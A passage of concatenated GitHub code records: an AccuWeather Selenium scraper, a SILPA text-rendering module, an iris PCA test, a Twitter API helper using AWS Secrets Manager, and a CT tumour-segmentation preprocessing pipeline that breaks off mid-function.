\"https://www.accuweather.com/es/es/madrid/308526/weather-forecast/308526\"\n]\n\nopts = Options()\nopts.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\")\n\n\ndef extraer_datos():\n driver = webdriver.Chrome(\n service=Service(ChromeDriverManager().install()),\n options=opts\n )\n\n for url in start_urls:\n driver.get(url)\n\n ciudad = driver.find_element(By.XPATH, '//h1').text\n current = driver.find_element(By.XPATH, '//div[contains(@class, \"cur-con-weather-card__body\")]//div[@class=\"temp\"]').text\n real_feel = driver.find_element(By.XPATH, '//div[contains(@class, \"cur-con-weather-card__body\")]//div[@class=\"real-feel\"]').text\n\n ciudad = ciudad.replace('\\n', '').replace('\\r', '').strip()\n current = current.replace('C', '').replace('°', '').replace('\\n', '').replace('\\r', '').strip()\n real_feel = real_feel.replace('RealFeel®', '').replace('°', '').replace('\\n', '').replace('\\r', '').strip()\n\n f = open(\"./datos_clima_selenium.csv\", \"a\")\n f.write(ciudad + \",\" + current + \",\" + real_feel + \"\\n\")\n f.close()\n\n 
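# echo the cleaned values so each scheduled scrape can be checked from the console\n        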
print(ciudad)\n print(current)\n print(real_feel)\n print()\n\n driver.close()\n\n\nschedule.every(5).seconds.do(extraer_datos)\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)\n\n","repo_name":"jeffreymonjacastro/2023-II","sub_path":"Web Scraping/nivel6/4_utomatizacion_selenium.py","file_name":"4_utomatizacion_selenium.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"22526890630","text":"import sys\nimport re\nimport os\nfrom common import *\nfrom utils import *\nimport cairo\nimport hashlib\nimport urllib\nimport pango\nimport pangocairo\nfrom wiki2pdf import Wikiparser\nfrom modules.hyphenator import hyphenator\nfrom styles import *\nfrom common.silparesponse import SilpaResponse\n\nclass Render(SilpaModule):\n def __init__(self):\n self.template = os.path.join(os.path.dirname(__file__), \"render.html\")\n self.tmp_folder = os.path.join(os.path.dirname(__file__), \"tmp\")\n self.response = SilpaResponse(self.template)\n \n \n def set_request(self,request):\n self.request=request\n self.response.populate_form(self.request)\n self.file_type= self.request.get('type')\n self.wiki_url= self.request.get('wiki')\n self.text = self.request.get('text')\n self.font = self.request.get('font')\n self.font_size = self.request.get('font_size')\n self.color = self.request.get('color')\n self.file_type = self.request.get('file_type')\n \n def set_start_response(self,start_response):\n self.start_response = start_response\n \n def get_response(self):\n if self.text != None:\n if self.file_type==None:\n self.file_type = \"png\"\n if self.font==None:\n self.font = \"Serif\" \n if self.font_size==None:\n self.font_size = 12 \n if self.color==None:\n self.color = \"Black\" \n image_url = self.render_text(self.text, self.file_type, 0, 0 ,self.color, self.font, self.font_size)\n self.response.response_code = \"303 see other\" \n self.response.header = [('Location', image_url)]\n if self.wiki_url != None: \n pdf_url = self.wiki2pdf(self.wiki_url, self.font)\n self.response.response_code = \"303 see other\" \n self.response.header = [('Location', pdf_url)]\n return self.response\n \n @ServiceMethod \n def wiki2pdf(self, url, font='Serif'):\n m = hashlib.md5()\n m.update(url.encode(\"utf-8\"))\n filename = m.hexdigest()[0:5]+\".pdf\"\n #if not os.path.exists(os.path.join(os.path.dirname(__file__), \"tmp\",filename)):\n parser = Wikiparser(url,filename, font) \n parser.parse()\n #else:\n\t\t#\tprint (\"File already exists.\") \n return (\"modules/render/tmp/\"+filename)\n \n @ServiceMethod \n def render_text(self, text, file_type='png', width=0, height=0, color=\"Black\", font='Serif', font_size=12):\n surface = None\n width=int(width)\n height=int(height)\n font_size=int(font_size)\n text= text.decode(\"utf-8\")\n m = hashlib.md5()\n m.update(text.encode(\"utf-8\"))\n filename = m.hexdigest()[0:5]+\".\"+file_type\n outputfile = os.path.join(self.tmp_folder, filename )\n if file_type == 'png':\n surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, int(width), int(height))\n if file_type == 'svg':\n surface = cairo.SVGSurface(outputfile,int(width),int(height))\n if file_type == 'pdf':\n surface = cairo.PDFSurface(outputfile,int(width),int(height))\n context = cairo.Context(surface)\n try:\n text = hyphenator.getInstance().hyphenate(text,u'\\u00AD')\n except:\n print(\"error while hyphenating. 
Proceeding without Hyphenation\") \n width = int(width)\n left_margin = 10\n top_margin = 20\n bottom_margin = 50\n position_x = left_margin\n position_y = top_margin\n rgba = get_color(color)\n context.set_source_rgba (float(rgba.red),float(rgba.green),float(rgba.blue),float(rgba.alpha))\n pc = pangocairo.CairoContext(context)\n paragraph_layout = pc.create_layout()\n paragraph_font_description = pango.FontDescription()\n paragraph_font_description.set_family(font)\n paragraph_font_description.set_size((int)(int(font_size) * pango.SCALE))\n paragraph_layout.set_font_description(paragraph_font_description)\n if width>0:\n paragraph_layout.set_width((int)((width-2*left_margin) * pango.SCALE))\n paragraph_layout.set_justify(True)\n paragraph_layout.set_text(text+\"\\n\")\n context.move_to(position_x, position_y)\n pango_layout_iter = paragraph_layout.get_iter();\n\n line_width = 0\n while not pango_layout_iter.at_last_line():\n first_line = True\n context.move_to(position_x, position_y)\n while not pango_layout_iter.at_last_line() :\n ink_rect, logical_rect = pango_layout_iter.get_line_extents()\n line = pango_layout_iter.get_line_readonly()\n has_next_line=pango_layout_iter.next_line()\n # Decrease paragraph spacing\n if ink_rect[2] == 0 : #It is para break\n dy = font_size / 2\n position_y += dy\n if not first_line:\n self.context.rel_move_to(0, dy)\n else:\n xstart = 1.0 * logical_rect[0] / pango.SCALE\n context.rel_move_to(xstart, 0)\n if width >0 and height > 0 :\n pc.show_layout_line( line)\n line_height = (int)(logical_rect[3] / pango.SCALE)\n line_width = (int)(logical_rect[2] / pango.SCALE)\n context.rel_move_to(-xstart, line_height )\n position_y += line_height \n first_line = False\n if width==0 or height==0:\n if width==0:\n width = line_width\n if height==0: \n height = position_y\n return self.render_text(text,file_type, width + 2.5*left_margin, height,color,font, font_size)\n if file_type == 'png':\n surface.write_to_png(str(outputfile))\n else:\n context.show_page()\n return \"modules/render/tmp/\"+filename\n\n def get_module_name(self):\n return \"Script Renderer\"\n\n def get_info(self):\n return \"Provides rendered images for Complex scripts\" \n \ndef getInstance():\n return Render()\n\n\n","repo_name":"santhoshtr/silpa","sub_path":"src/silpa/modules/render/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":6255,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"78"} +{"seq_id":"16562205616","text":"from pcalib import dpca\nimport pandas as pd\n\nurl = \"https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data\"\ndf = pd.read_csv(url, names=['sepal length','sepal width','petal length','petal width','target'])\n\nfeatures = ['sepal length', 'sepal width', 'petal length', 'petal width']\nlabel = ['target']\n\nnewdf = dpca(df, features, label, 2, [\"pc1\",\"pc2\"])\nnewdf = newdf.apply()\n\nprint(newdf.head(5))\n","repo_name":"ivanachillee/pcalib","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72065974331","text":"import boto3\nimport tweepy\nimport base64\nimport ast\nfrom botocore.exceptions import ClientError\n\ndef get_credentials():\n secret_name = 'automated_david_credentials'\n region_name = 'us-east-1'\n\n # Create a Secrets Manager client\n session = boto3.session.Session()\n client = session.client(\n service_name='secretsmanager',\n 
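# region_name is the hard-coded us-east-1 set above; the secret must exist in that region\n        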
region_name=region_name\n )\n\n # In this sample we only handle the specific exceptions for the 'GetSecretValue' API.\n # See https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html\n # We rethrow the exception by default.\n\n try:\n get_secret_value_response = client.get_secret_value(\n SecretId=secret_name\n )\n except ClientError as e:\n if e.response['Error']['Code'] == 'DecryptionFailureException':\n # Secrets Manager can't decrypt the protected secret text using the provided KMS key.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InternalServiceErrorException':\n # An error occurred on the server side.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidParameterException':\n # You provided an invalid value for a parameter.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidRequestException':\n # You provided a parameter value that is not valid for the current state of the resource.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'ResourceNotFoundException':\n # We can't find the resource that you asked for.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n else:\n # Decrypts secret using the associated KMS CMK.\n # Depending on whether the secret is a string or binary, one of these fields will be populated.\n if 'SecretString' in get_secret_value_response:\n secret = get_secret_value_response['SecretString']\n return ast.literal_eval(secret)\n else:\n decoded_binary_secret = base64.b64decode(get_secret_value_response['SecretBinary'])\n return decoded_binary_secret\n\n# Access and authorize our Twitter credentials from credentials.py\ndef twitter_api_connect():\n creds = get_credentials()\n auth = tweepy.OAuthHandler(creds['CONSUMER_KEY'], creds['CONSUMER_SECRET'])\n auth.set_access_token(creds['ACCESS_TOKEN'], creds['ACCESS_TOKEN_SECRET'])\n api = tweepy.API(auth_handler=auth, wait_on_rate_limit=True)\n return api\n\ndef get_tweet_url(tweet):\n return 'https://twitter.com/' + tweet.user.screen_name + '/status/' + tweet.id_str","repo_name":"ddurks/automated_david","sub_path":"twitter_api.py","file_name":"twitter_api.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70694658812","text":"import sys\nimport os\nimport pydicom\nimport glob\nimport SimpleITK as sitk\nimport pandas as pd\nimport numpy as np\nfrom dcm_to_nrrd import dcm_to_nrrd\nfrom rtstruct_to_nrrd import rtstruct_to_nrrd\nfrom combine_structures import combine_structures\nfrom interpolate import interpolate\nfrom crop_image import crop_top, crop_top_image_only, crop_full_body\nfrom registration import nrrd_reg_rigid\nimport SimpleITK as sitk\nimport shutil\nimport nibabel as ni\n\n\ndef change_img_name(proj_dir):\n count = 0\n for root, subdirs, files in os.walk(proj_dir + '/raw_img'):\n for fn in files:\n count += 1\n #print(fn)\n old_path = os.path.join(root, fn)\n #fn = fn.replace('-', '_')\n new_fn = fn.split('_')[1] + '.nrrd'\n print(count, new_fn)\n new_path = os.path.join(root, new_fn)\n print(count, new_path)\n os.rename(old_path, new_path) \n\n\ndef get_seg_info(proj_dir):\n \"\"\"\n COMBINING MASKS \n \"\"\"\n dfci_img_dir = proj_dir + '/raw_img'\n dfci_seg_dir = 
proj_dir + '/uncombined_seg'\n output_dir = proj_dir + '/output_data' \n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n _pn_list = ['cm', 'mm', '+', '**', 'z', 'none', 'resident', 'pre', 'dfrm', 'Dfmd', 'dfmd','Dfrmd', \n 'CTV', 'Pre', 'Expansion', 'virtual', 'Virtual', 'LX', 'TEMP', 'expand', 'larynx', 'vGTV']\n _N_list = ['TONSIL', 'Prim', 'NPX', 'OPX', 'FINAL', 'Pre', 'Tonsil', 'New', 'Dfrmd', 'TNSL']\n _n_list = ['tonsil', 'TONSIL', 'expand', 'noFDG', 'resident', 'Central', 'central', 'Joint', 'PT', \n 'nodose', 'Tnsil', 'Tonsil', 'yinitialGTVp', 'Pre', 'larynx', 'Combined', 'p', 'new']\n n_list = ['L 2', 'R 3', 'L_lvl', 'R_lvl', 'parotid', 'L2', 'parap', 'LII', 'RII', 'R_2']\n p_list = ['BOT', 'P', 'p', 'pn', 'Tonsil', 'Primary', 'TONSIL', 'prim', 'primary', 'RTONSIL', 'PRIMARY', \n 'tonsil', 'Prim', 'phar', 'OPX', 'HPX', 'palate', 'larynx', 'Central', 'central', 'TNSL', 'tumor', '_p_70_n'] \n _p_list = ['NK', 'LN', 'parotid', 'parap', 'neck', 'Neck', 'RP', 'Node', 'RII', 'LII', 'R_2', 'GTVn']\n seg_IDsss = []\n for tumor_type in ['pn', 'n', 'p']:\n if tumor_type == 'pn':\n pat_IDs = []\n seg_IDss = [] \n for img_dir in sorted(glob.glob(dfci_img_dir + '/*nrrd')):\n seg_dirs = []\n seg_IDs = []\n pat_id = img_dir.split('/')[-1].split('.')[0]\n #print(pat_id)\n for folder in os.listdir(dfci_seg_dir):\n ID = folder.split('.')[0]\n if ID == pat_id:\n #print(ID)\n for seg_dir in glob.glob(os.path.join(dfci_seg_dir, folder) + '/*nrrd'):\n seg_name = seg_dir.split('/')[-1].split('.')[0]\n if 'GTV' in seg_name and not any(x in seg_name for x in _pn_list):\n seg_dirs.append(seg_dir)\n seg_IDs.append(seg_name)\n print(pat_id, seg_IDs)\n pat_IDs.append(pat_id)\n seg_IDss.append(seg_IDs)\n elif tumor_type == 'n':\n pat_IDs = []\n seg_IDss = []\n for img_dir in sorted(glob.glob(dfci_img_dir + '/*nrrd')):\n seg_dirs = []\n seg_IDs = []\n pat_id = img_dir.split('/')[-1].split('.')[0]\n #print(pat_id)\n for folder in os.listdir(dfci_seg_dir):\n ID = folder.split('.')[0]\n if ID == pat_id:\n #print(ID)\n for seg_dir in glob.glob(os.path.join(dfci_seg_dir, folder) + '/*nrrd'):\n seg_name = seg_dir.split('/')[-1].split('.')[0]\n if 'GTV' in seg_name and not any(x in seg_name for x in _pn_list):\n if 'N' in seg_name and not any(x in seg_name for x in _N_list):\n seg_dirs.append(seg_dir)\n seg_IDs.append(seg_name)\n elif 'n' in seg_name and not any(x in seg_name for x in _n_list):\n seg_dirs.append(seg_dir)\n seg_IDs.append(seg_name)\n elif any(x in seg_name for x in n_list):\n seg_dirs.append(seg_dir)\n seg_IDs.append(seg_name)\n print(pat_id, seg_IDs)\n pat_IDs.append(pat_id)\n seg_IDss.append(seg_IDs)\n elif tumor_type == 'p':\n pat_IDs = []\n seg_IDss = []\n for img_dir in sorted(glob.glob(dfci_img_dir + '/*nrrd')):\n seg_dirs = []\n seg_IDs = []\n pat_id = img_dir.split('/')[-1].split('.')[0]\n #print(pat_id)\n for folder in os.listdir(dfci_seg_dir):\n ID = folder.split('.')[0]\n if ID == pat_id:\n #print(ID)\n for seg_dir in glob.glob(os.path.join(dfci_seg_dir, folder) + '/*nrrd'):\n seg_name = seg_dir.split('/')[-1].split('.')[0]\n if 'GTV' in seg_name and not any(x in seg_name for x in _pn_list):\n if any(x in seg_name for x in p_list) and not any(x in seg_name for x in _p_list):\n seg_dirs.append(seg_dir)\n seg_IDs.append(seg_name)\n print(pat_id, seg_IDs)\n pat_IDs.append(pat_id)\n seg_IDss.append(seg_IDs)\n seg_IDsss.append(seg_IDss)\n df = pd.DataFrame({'pat id': pat_IDs, 'pn': seg_IDsss[0], 'n': seg_IDsss[1], 'p': seg_IDsss[2]})\n fn = output_dir + '/GTV_seg.csv'\n 
df.to_csv(fn, index=True)\n\n\ndef combine_mask2(proj_dir, tumor_type):\n \"\"\"\n COMBINING MASKS \n \"\"\"\n raw_img_dir = proj_dir + '/raw_img'\n uncombined_seg_dir = proj_dir + '/uncombined_seg'\n seg_n_save_dir = proj_dir + '/raw_seg_n'\n seg_p_save_dir = proj_dir + '/raw_seg_p'\n seg_pn_save_dir = proj_dir + '/raw_seg_pn'\n if not os.path.exists(seg_n_save_dir):\n os.makedirs(seg_n_save_dir)\n if not os.path.exists(seg_p_save_dir):\n os.makedirs(seg_p_save_dir)\n if not os.path.exists(seg_pn_save_dir):\n os.makedirs(seg_pn_save_dir)\n if tumor_type == 'n':\n seg_save_dir = seg_n_save_dir\n if tumor_type == 'p':\n seg_save_dir = seg_p_save_dir\n if tumor_type == 'pn':\n seg_save_dir = seg_pn_save_dir\n \n df = pd.read_csv(proj_dir + '/output_data/GTV_seg.csv', converters={tumor_type: pd.eval})\n img_ids = []\n seg_namess = []\n bad_data = []\n count = 0\n for img_dir in sorted(glob.glob(raw_img_dir + '/*nrrd')):\n seg_names = []\n seg_dirs = []\n #img_id = img_dir.split('/')[-1].split('_')[1]\n img_id = img_dir.split('/')[-1].split('.')[0]\n #print(img_id)\n for seg_folder in os.listdir(uncombined_seg_dir):\n #print(seg_folder)\n #seg_id = seg_folder.split('_')[1]\n seg_id = str(seg_folder)\n #print(seg_id)\n if seg_id == img_id:\n count += 1\n print(count, 'ID:', seg_id)\n for df_id, gtv_list in zip(df['pat id'], df[tumor_type]):\n if df_id == seg_id:\n print(df_id)\n print(gtv_list)\n if gtv_list:\n for gtv in gtv_list:\n gtv_dir = uncombined_seg_dir + '/' + seg_folder + '/' + gtv + '.nrrd'\n #print(gtv_dir)\n seg_dirs.append(gtv_dir)\n else:\n print('empty GTV list!')\n try:\n combined_mask = combine_structures(\n patient_id=seg_id, \n mask_arr=seg_dirs, \n path_to_reference_image_nrrd=img_dir, \n binary=2, \n return_type='sitk_object', \n output_dir=seg_save_dir)\n print('combine successfully')\n except Exception as e:\n print(seg_id, e)\n bad_data.append(seg_id)\n print('bad data:', bad_data)\n\n\ndef combine_mask(proj_dir, tumor_type):\n \"\"\"\n COMBINING MASKS \n \"\"\"\n raw_img_dir = proj_dir + '/raw_img'\n uncombined_seg_dir = proj_dir + '/uncombined_seg'\n seg_n_save_dir = proj_dir + '/raw_seg_n'\n seg_p_save_dir = proj_dir + '/raw_seg_p'\n seg_pn_save_dir = proj_dir + '/raw_seg_pn'\n if not os.path.exists(seg_n_save_dir):\n os.makedirs(seg_n_save_dir)\n if not os.path.exists(seg_p_save_dir):\n os.makedirs(seg_p_save_dir)\n if not os.path.exists(seg_pn_save_dir):\n os.makedirs(seg_pn_save_dir)\n if tumor_type == 'n':\n seg_save_dir = seg_n_save_dir\n csv_save_dir = proj_dir + '/combined_seg_n.csv'\n if tumor_type == 'p':\n seg_save_dir = seg_p_save_dir\n csv_save_dir = proj_dir + '/combined_seg_p.csv'\n if tumor_type == 'pn':\n seg_save_dir = seg_pn_save_dir\n csv_save_dir = proj_dir + '/combined_seg_pn.csv'\n img_ids = []\n seg_namess = []\n count = 0\n for img_dir in sorted(glob.glob(raw_img_dir + '/*nrrd')):\n seg_names = []\n seg_dirs = []\n #img_id = img_dir.split('/')[-1].split('_')[1]\n img_id = img_dir.split('/')[-1].split('.')[0]\n #print(img_id)\n for seg_folder in os.listdir(uncombined_seg_dir):\n #print(seg_folder)\n #seg_id = seg_folder.split('_')[1]\n seg_id = str(seg_folder)\n #print(seg_id)\n if seg_id == img_id:\n count += 1\n print(count, 'ID:', seg_id)\n for seg_dir in glob.glob(uncombined_seg_dir + '/' + seg_folder + '/*nrrd'):\n seg_name = seg_dir.split('/')[-1].split('.')[0]\n #print(seg_dir)\n #print(seg_name)\n if tumor_type == 'pn':\n if 'GTV' in seg_name and 'cm' not in seg_name and 'mm' not in seg_name \\\n and '+' not in seg_name and '**' not in 
seg_name and 'z' not in seg_name \\\n and 'resident' not in seg_name and 'pre' not in seg_name and 'Dfmd' not in seg_name:\n seg_dirs.append(seg_dir)\n seg_names.append(seg_name)\n #print('seg names:', seg_names)\n #print(seg_dir)\n elif tumor_type == 'n':\n if 'GTV' in seg_name and 'cm' not in seg_name and 'mm' not in seg_name \\\n and '+' not in seg_name and '**' not in seg_name and 'z' not in seg_name \\\n and 'resident' not in seg_name and 'pre' not in seg_name and 'Dfmd' not in seg_name:\n if 'N' in seg_name and 'TONSIL' not in seg_name and 'Prim' not in seg_name \\\n and 'NPX' not in seg_name and 'Neck' not in seg_name and 'FINAL' not in seg_name:\n seg_dirs.append(seg_dir)\n seg_names.append(seg_name)\n elif 'n' in seg_name and 'tonsil' not in seg_name and 'Tonsil' not in seg_name \\\n and 'expand' not in seg_name and 'noFDG' not in seg_name and 'resident' \\\n not in seg_name and 'neck' not in seg_name:\n seg_dirs.append(seg_dir)\n seg_names.append(seg_name)\n elif tumor_type == 'p':\n if 'GTV' in seg_name and 'cm' not in seg_name and 'mm' not in seg_name \\\n and '+' not in seg_name and '**' not in seg_name and 'z' not in seg_name \\\n and 'resident' not in seg_name and 'pre' not in seg_name and 'Dfmd' not in seg_name:\n if 'BOT' in seg_name or 'P' in seg_name or 'Tonsil' in seg_name \\\n or 'Primary' in seg_name or 'TONSIL' in seg_name or 'prim' in seg_name \\\n or 'primary' in seg_name or 'RTONSIL' in seg_name or 'PRIMARY' in seg_name \\\n or 'tonsil' in seg_name or 'Prim' in seg_name or 'phar' in seg_name \\\n or 'OPX' in seg_name or 'HPX' in seg_name or 'palate' in seg_name \\\n or 'phar' in seg_name:\n seg_dirs.append(seg_dir)\n seg_names.append(seg_name)\n\n try:\n combined_mask = combine_structures(\n patient_id=seg_id, \n mask_arr=seg_dirs, \n path_to_reference_image_nrrd=img_dir, \n binary=2, \n return_type='sitk_object', \n output_dir=seg_save_dir)\n print('combine successfully')\n except Exception as e:\n print(seg_id, e)\n if seg_names == []:\n print('no GTV!')\n img_ids.append(img_id)\n seg_namess.append(seg_names)\n # save mask information\n df = pd.DataFrame({'pat id': img_ids, 'seg id': seg_namess})\n df.to_csv(csv_save_dir, index=False) \n\n\ndef get_pn_seg(proj_dir):\n \"\"\"\n 1) combine p_seg and n_seg to a 4d nii image;\n 2) p_seg and n_seg in different channels;\n Args:\n proj_dir {path} -- project path\n Returns:\n save nii files\n Raise issues:\n none\n \"\"\"\n p_seg_path = proj_dir + '/raw_seg_p'\n n_seg_path = proj_dir + '/raw_seg_n'\n pn_seg_path = proj_dir + '/raw_seg_pn'\n p_n_seg_path = proj_dir + '/raw_seg_p_n'\n img_path = proj_dir + '/raw_img'\n if not os.path.exists(p_n_seg_path):\n os.makedirs(p_n_seg_path)\n fns = [i for i in sorted(os.listdir(pn_seg_path))]\n for i, fn in enumerate(fns):\n try:\n pat_id = fn.split('.')[0]\n print(i, pat_id)\n # image\n img_dir = img_path + '/' + fn\n img = sitk.ReadImage(img_dir)\n arr = sitk.GetArrayFromImage(img)\n # primary tumor\n p_seg_dir = p_seg_path + '/' + fn\n if os.path.exists(p_seg_dir):\n p_seg = sitk.ReadImage(p_seg_dir)\n p_seg = sitk.GetArrayFromImage(p_seg)\n p_seg[p_seg != 0] = 1\n #print('p_seg shape:', p_seg.shape)\n else:\n print('no primary segmentation...')\n p_seg = np.zeros(shape=arr.shape)\n # node\n n_seg_dir = n_seg_path + '/' + fn\n if os.path.exists(n_seg_dir):\n n_seg = sitk.ReadImage(n_seg_dir)\n n_seg = sitk.GetArrayFromImage(n_seg)\n n_seg[n_seg != 0] = 2\n else:\n print('no node segmentation...')\n n_seg = np.zeros(shape=arr.shape)\n # combine P and N to one np arr\n p_n_seg 
= np.add(p_seg, n_seg).astype(int)\n # change dtype, otherwise nrrd cannot be read\n p_n_seg = np.asarray(p_n_seg, dtype='uint8')\n # some voxels from P and N have overlap\n p_n_seg[p_n_seg == 3] = 1\n sitk_obj = sitk.GetImageFromArray(p_n_seg)\n sitk_obj.SetSpacing(img.GetSpacing())\n sitk_obj.SetOrigin(img.GetOrigin())\n # write new nrrd\n writer = sitk.ImageFileWriter()\n writer.SetFileName(p_n_seg_path + '/' + pat_id + '.nrrd')\n writer.SetUseCompression(True)\n writer.Execute(sitk_obj)\n except Exception as e:\n print(pat_id, e)\n\n\ndef interp_reg_crop(proj_dir, root_dir, tumor_type, image_format, crop_shape):\n \"\"\"\n Rigid Registration - followed by top crop\n \"\"\"\n print('------start registration--------')\n img_raw_dir = proj_dir + '/raw_img'\n seg_p_n_raw_dir = proj_dir + '/raw_seg_p_n'\n seg_pn_raw_dir = proj_dir + '/raw_seg_pn'\n seg_p_raw_dir = proj_dir + '/raw_seg_p'\n seg_n_raw_dir = proj_dir + '/raw_seg_n'\n\n img_crop_dir = proj_dir + '/crop_img_160'\n seg_p_n_crop_dir = proj_dir + '/crop_seg_p_n_160'\n seg_pn_crop_dir = proj_dir + '/crop_seg_pn_160'\n seg_p_crop_dir = proj_dir + '/crop_seg_p'\n seg_n_crop_dir = proj_dir + '/crop_seg_n'\n if not os.path.exists(img_crop_dir):\n os.makedirs(img_crop_dir)\n if not os.path.exists(seg_p_n_crop_dir):\n os.makedirs(seg_p_n_crop_dir)\n if not os.path.exists(seg_pn_crop_dir):\n os.makedirs(seg_pn_crop_dir)\n if not os.path.exists(seg_p_crop_dir):\n os.makedirs(seg_p_crop_dir)\n if not os.path.exists(seg_n_crop_dir):\n os.makedirs(seg_n_crop_dir)\n\n img_dirs = [i for i in sorted(glob.glob(img_raw_dir + '/*nrrd'))]\n seg_p_n_dirs = [i for i in sorted(glob.glob(seg_p_n_raw_dir + '/*nrrd'))]\n seg_pn_dirs = [i for i in sorted(glob.glob(seg_pn_raw_dir + '/*nrrd'))]\n seg_p_dirs = [i for i in sorted(glob.glob(seg_p_raw_dir + '/*nrrd'))]\n seg_n_dirs = [i for i in sorted(glob.glob(seg_n_raw_dir + '/*nrrd'))]\n if tumor_type == 'p_n':\n seg_dirs = seg_p_n_dirs\n seg_crop_dir = seg_p_n_crop_dir\n elif tumor_type == 'pn':\n seg_dirs = seg_pn_dirs\n seg_crop_dir = seg_pn_crop_dir\n elif tumor_type == 'p':\n seg_dirs = seg_p_dirs\n seg_crop_dir = seg_p_crop_dir\n elif tumor_type == 'n':\n seg_dirs = seg_n_dirs\n seg_crop_dir = seg_n_crop_dir\n img_ids = []\n bad_ids = []\n bad_scans = []\n count = 0\n # get register template\n fixed_img_dir = root_dir + '/DFCI/img_interp/10020741814.nrrd'\n fixed_img = sitk.ReadImage(fixed_img_dir, sitk.sitkFloat32)\n for img_dir in img_dirs:\n img_id = img_dir.split('/')[-1].split('.')[0]\n #print(img_id)\n for seg_dir in seg_dirs:\n seg_id = seg_dir.split('/')[-1].split('.')[0]\n #print(seg_id)\n if img_id == seg_id:\n img_ids.append(img_id)\n count += 1\n print(count, img_id)\n # load img and seg\n img = sitk.ReadImage(img_dir, sitk.sitkFloat32)\n seg = sitk.ReadImage(seg_dir, sitk.sitkFloat32)\n # --- crop full body scan ---\n z_img = img.GetSize()[2]\n z_seg = seg.GetSize()[2]\n if z_img < 105:\n print('This is an incomplete scan!')\n bad_scans.append(seg_id)\n else:\n if z_img > 200:\n img = crop_full_body(img, int(z_img * 0.65))\n seg = crop_full_body(seg, int(z_seg * 0.65))\n try:\n # --- interpolation for image and seg to 1x1x3 ---\n # interpolate images\n print('interplolate')\n img_interp = interpolate(\n patient_id=img_id, \n path_to_nrrd=img_dir, \n interpolation_type='linear', #\"linear\" for image\n new_spacing=(1, 1, 3), \n return_type='sitk_obj', \n output_dir='',\n image_format=image_format)\n # interpolate segs\n seg_interp = interpolate(\n patient_id=img_id, \n path_to_nrrd=seg_dir, 
\n interpolation_type='nearest_neighbor', # nearest neighbor for label\n new_spacing=(1, 1, 3), \n return_type='sitk_obj', \n output_dir='',\n image_format=image_format) \n # --- registration for image and seg to 1x1x3 --- \n # register images\n print('register')\n reg_img, fixed_img, moving_img, final_transform = nrrd_reg_rigid( \n patient_id=img_id, \n moving_img=img_interp, \n output_dir='', \n fixed_img=fixed_img,\n image_format=image_format)\n # register segmentations\n reg_seg = sitk.Resample(\n seg_interp, \n fixed_img, \n final_transform, \n sitk.sitkNearestNeighbor, \n 0.0, \n moving_img.GetPixelID())\n # --- crop ---\n print('cropping')\n crop_top(\n patient_id=img_id,\n img=reg_img,\n seg=reg_seg,\n crop_shape=crop_shape,\n return_type='sitk_object',\n output_img_dir=img_crop_dir,\n output_seg_dir=seg_crop_dir,\n image_format=image_format)\n print('successfully crop!')\n except Exception as e:\n bad_ids.append(img_id)\n print(img_id, e)\n print('bad ids:', bad_ids)\n print('incomplete scans:', bad_scans)\n\n\ndef crop(proj_dir, tumor_type, crop_shape, image_format): \n \"\"\"\nWith TOP-CROP HPC ### NEED TO RUN FOR image_crop, image_crop_p, and image_crop_n \n WILL ONLY WORK WITH SPACING = 1,1,3\n \"\"\"\n print('------start cropping--------')\n img_reg_dir = proj_dir + '/reg_img2'\n seg_p_n_reg_dir = proj_dir + '/reg_seg_p_n2'\n seg_pn_reg_dir = proj_dir + '/reg_seg_pn2'\n seg_p_reg_dir = proj_dir + '/reg_seg_p2'\n seg_n_reg_dir = proj_dir + '/reg_seg_n2'\n img_crop_dir = proj_dir + '/crop_img'\n seg_p_n_crop_dir = proj_dir + '/crop_seg_p_n2'\n seg_pn_crop_dir = proj_dir + '/crop_seg_pn2'\n seg_p_crop_dir = proj_dir + '/crop_seg_p2'\n seg_n_crop_dir = proj_dir + '/crop_seg_n2'\n if not os.path.exists(img_crop_dir):\n os.makedirs(img_crop_dir)\n if not os.path.exists(seg_p_n_crop_dir):\n os.makedirs(seg_p_n_crop_dir)\n if not os.path.exists(seg_pn_crop_dir):\n os.makedirs(seg_pn_crop_dir)\n if not os.path.exists(seg_p_crop_dir):\n os.makedirs(seg_p_crop_dir)\n if not os.path.exists(seg_n_crop_dir):\n os.makedirs(seg_n_crop_dir)\n img_reg_dirs = [i for i in sorted(glob.glob(img_reg_dir + '/*nrrd'))]\n seg_p_n_reg_dirs = [i for i in sorted(glob.glob(seg_p_n_reg_dir + '/*nrrd'))]\n seg_pn_reg_dirs = [i for i in sorted(glob.glob(seg_pn_reg_dir + '/*nrrd'))]\n seg_p_reg_dirs = [i for i in sorted(glob.glob(seg_p_reg_dir + '/*nrrd'))]\n seg_n_reg_dirs = [i for i in sorted(glob.glob(seg_n_reg_dir + '/*nrrd'))]\n if tumor_type == 'p_n':\n seg_dirs = seg_p_n_reg_dirs\n seg_crop_dir = seg_p_n_crop_dir\n elif tumor_type == 'pn':\n seg_dirs = seg_pn_reg_dirs\n seg_crop_dir = seg_pn_crop_dir\n elif tumor_type == 'p':\n seg_dirs = seg_p_reg_dirs\n seg_crop_dir = seg_p_crop_dir\n elif tumor_type == 